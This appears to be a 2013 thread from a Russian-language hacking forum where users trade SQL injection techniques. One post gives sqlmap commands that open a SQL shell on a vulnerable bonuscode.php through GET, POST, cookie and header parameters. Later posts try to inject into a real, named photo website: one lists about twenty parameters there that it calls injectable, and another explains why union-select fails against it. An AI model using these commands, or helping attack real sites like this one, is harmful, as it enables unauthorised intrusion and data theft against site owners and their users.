Ваши вопросы по уязвимостям.

05.03.2013, 16:03

Sat-hacker

Познающий

Регистрация: 19.05.2012

Сообщений: 98

С нами: 7359446

Репутация: -10

Скачал актив perl установил денвер.Дайте кто-то ссылку на рабочий exploit для проверки,например в faq.php в Vbulletin. Спасибо.

𝕏 Twitter Reddit Telegram Копировать ссылку

05.03.2013, 16:51

$Аватар для \/IRUS$

\/IRUS

Постоянный

Регистрация: 03.08.2012

Сообщений: 371

С нами: 7250006

Репутация: 37

Цитата:

Сообщение от zloy_fantom

2.
Уязвимость позволяет удаленному пользователю выполнить произвольный SQL запрос в атакуемой системе.
Уязвимость существует из-за не достаточной проверки входящего параметра code при вводе кода.
Класс данной уязвимости низкий, по причине, того что воспользоваться ей можно если только на сервере стоит error_reporting не ниже E_WARNING.
./bonuscode.php
Код:
$res = sql_query("SELECT * FROM bonusgen WHERE pid = '".$s."'");

в случае если параметр передается явно в GET запросе и именем s, по условию исключаем Error-Based и Union техники то SQL-shell можно будет вызвать:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php?s=1" --technique="BT" --level=5 --sql-shell

в POST параметре s:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --data="s=1" --technique="BT" --level=5 --sql-shell

в Cookie параметре s:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --cookie="s=1" --technique="BT" --level=5 --sql-shell

в Referer:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p referer --technique="BT" --level=5 --sql-shell

в User-Agent:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p user-agent --technique="BT" --level=5 --sql-shell

в любом добавочном хидере:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --headers="Accept-Language: fr\nETag: 1%1" --technique="BT" --level=5 --sql-shell

и т.д.

05.03.2013, 19:10

borntobebad

Новичок

Регистрация: 23.03.2009

Сообщений: 14

С нами: 9018815

Репутация: 0

ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut

http://www.pixheaven.net/bestof.php?begin=276&entout=12'

ili

http://www.pixheaven.net/photo.php?nom=120906_9930-46'

05.03.2013, 21:16

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

С нами: 10992741

Репутация: 0

Цитата:

Сообщение от borntobebad

ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut
http://www.pixheaven.net/bestof.php?begin=276&entout=12'
ili
http://www.pixheaven.net/photo.php?nom=120906_9930-46'

что-то я тоже не могу вдуплить

просмотрел сайт, вот эти уязвимые к sql-inj параметры:

Код:

/bestof.php
begin 
entout 

/bestof_us.php
begin 
entout 

/blog.php
begin 

/blog_us.php
begin 

/livredor_lire.php
begin 

/livredor_lire_us.php
begin 

/maj.php
begin 

/maj_us.php
begin 

/photo
nom 

/photo.php
nom 

/photo_us
nom 

/publications_site.php
begin 

/publications_site_us.php
begin 

/recherche_quoi.php
Afficher 
begin 
entout 

/recherche_quoi_us.php
Afficher 
begin 
entout 

/wallpapers.php
begin 
entout 

/wallpapers_us.php
begin 
entout

но ни один не смог раскрутить...

05.03.2013, 22:13

qaz

Познавший АНТИЧАТ

Регистрация: 12.07.2010

Сообщений: 1,546

С нами: 8334326

Репутация: 75

Цитата:

Сообщение от borntobebad

ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut
http://www.pixheaven.net/bestof.php?begin=276&entout=12'
ili
http://www.pixheaven.net/photo.php?nom=120906_9930-46'

иньекция в лимите, поэтому ничего и не выходит